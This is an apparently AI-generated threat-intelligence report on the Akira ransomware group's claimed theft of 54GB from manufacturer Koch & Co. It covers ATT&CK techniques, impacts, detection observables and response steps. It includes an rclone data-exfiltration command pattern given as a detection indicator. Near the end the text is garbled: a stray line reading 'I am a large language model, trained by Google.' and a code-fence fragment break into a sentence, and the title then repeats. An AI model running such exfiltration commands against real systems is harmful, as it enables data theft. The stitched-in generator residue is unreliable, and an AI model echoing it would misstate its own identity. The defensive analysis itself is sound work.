Akira Ransomware Hits US Manufacturer Koch & Co., Threatens to Leak 54GB of Data

Executive Summary

The Akira ransomware group has claimed responsibility for a cyberattack against Koch & Co., Inc., a U.S.-based manufacturer of wood doors and cabinets. On November 7, 2025, the group posted the company's name on its dark web leak site, alleging the theft of 54GB of sensitive data. The threat actors are employing a double-extortion tactic, threatening to release the exfiltrated data—which they claim includes financial records, contracts, and HR files—if their ransom demands are not met. This incident underscores Akira's continued focus on targeting manufacturing and other mid-sized enterprises, leveraging data exfiltration as a primary tool for coercing victims into payment.

Threat Overview

Threat Actor: Akira is a well-established ransomware-as-a-service (RaaS) operation known for its distinctive retro-themed leak site and aggressive tactics. They have been active since early 2023 and are known to target a wide range of industries, with a particular focus on manufacturing, education, and professional services.
Malware: The Akira ransomware is written in C++ and is known for its ability to encrypt a wide variety of file types, appending a .akira extension to encrypted files. The group also uses a Linux variant to target VMware ESXi servers.
Attack Pattern: Akira typically follows a standard double-extortion model:
1. Initial Access: Often gained through compromised credentials for VPNs without multi-factor authentication, or by exploiting known vulnerabilities (e.g., in Cisco ASA devices). This aligns with T1133 - External Remote Services.
2. Lateral Movement and Discovery: Once inside, they use tools like Mimikatz for credential harvesting (T1003 - OS Credential Dumping) and PsExec for lateral movement.
3. Data Exfiltration: Before deploying ransomware, they exfiltrate large volumes of sensitive data to be used as leverage (T1041 - Exfiltration Over C2 Channel).
4. Impact: Finally, they deploy the ransomware to encrypt systems across the network (T1486 - Data Encrypted for Impact).

Technical Analysis

In the attack on Koch & Co., Akira claims to have stolen 54GB of highly sensitive data. This suggests they had prolonged, privileged access to the network, allowing them to identify and stage critical data from file servers, financial systems, and HR databases. The types of data claimed—financials, contracts, and HR files—are specifically chosen to maximize pressure on the victim company, as their public release could cause severe reputational damage, regulatory penalties, and competitive disadvantage.

While the specific initial access vector for this attack is unknown, Akira's known TTPs provide a strong basis for defense and detection. Their heavy reliance on credential abuse makes strong authentication controls a critical defense.

MITRE ATT&CK Techniques Associated with Akira

Tactic

Initial Access

Technique ID

T1133

Name

External Remote Services

Description

Exploiting VPNs without MFA is a common entry point.

Tactic

Credential Access

Technique ID

T1003

Name

OS Credential Dumping

Description

Using tools like Mimikatz to harvest credentials.

Tactic

Lateral Movement

Technique ID

T1570

Name

Lateral Tool Transfer

Description

Moving tools like PsExec and AnyDesk across the network.

Tactic

Exfiltration

Technique ID

T1567.002

Name

Exfiltration to Cloud Storage

Description

Using tools like Rclone or WinSCP to upload data to cloud services.

Tactic

Impact

Technique ID

T1486

Name

Data Encrypted for Impact

Description

The final ransomware deployment stage.

Impact Assessment

If Akira's claims are true, Koch & Co. faces severe consequences:

Operational Disruption: If systems were encrypted, manufacturing and business operations could be halted for an extended period, leading to significant revenue loss.
Data Breach Notification Costs: The company may be legally required to notify all employees and potentially customers whose data was compromised, incurring costs for credit monitoring and legal services.
Reputational Damage: The public leak of sensitive financial and HR data can damage the company's reputation with employees, partners, and customers.
Financial Loss: Beyond the potential ransom payment, the costs of incident response, system recovery, and security upgrades will be substantial.

Cyber Observables for Detection

To hunt for Akira activity, security teams should look for the following:

Type

file_name

Value

akira_readme.txt

Description

The standard name of the ransom note dropped by Akira.

Context

EDR, File system monitoring

Type

file_name

Value

*.akira

Description

The file extension appended to files encrypted by the ransomware.

Context

EDR, File system monitoring

Type

process_name

Value

AnyDesk.exe

Description

Akira has been observed using the legitimate remote access tool AnyDesk for persistence.

Context

Process creation logs, EDR alerts

Type

command_line_pattern

Value

rclone.exe copy /path/to/data remote:bucket

Description

The use of Rclone to exfiltrate data to a cloud storage provider.

Context

Process creation logs (Event ID 4688)

Type

registry_key

Value

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Client

Description

A registry key Akira has been known to use for persistence.

Context

Registry monitoring, EDR

Detection & Response

Monitor for Credential Dumping: Deploy EDR rules to detect the execution of Mimikatz or access to the LSASS process memory. This is a key precursor to Akira's lateral movement and is a form of D3FEND's D3-PA: Process Analysis.
Analyze VPN Logs: Scrutinize VPN authentication logs for suspicious activity, such as logins from unusual locations, multiple failed attempts followed by a success, or use of accounts for employees who do not normally use VPNs. This relates to D3FEND's D3-UGLPA: User Geolocation Logon Pattern Analysis. 3I am a large language model, trained by Google.```json

Akira Ransomware Group Claims Cyberattack on Koch & Co., Allegedly Stealing 54GB of Financial and HR Data